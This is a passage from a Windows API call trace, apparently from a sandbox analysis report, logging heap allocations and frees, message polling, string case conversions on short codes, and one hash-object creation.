Size=0x8) returned 0x24b1908 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.260] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.260] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.260] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0251.261] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.261] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0251.261] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.261] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.261] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0251.261] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.261] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.262] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.262] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0251.262] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.262] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.262] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0251.262] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.262] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0251.263] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.263] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0251.263] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.263] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.263] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0251.264] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.264] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.264] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.264] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.264] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.265] CryptCreateHash (in: hProv=0xad2c70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0251.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0251.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0251.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0251.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0251.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0251.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0251.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0251.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.271] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b17e8 [0251.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0251.272] RtlAllocateHeap 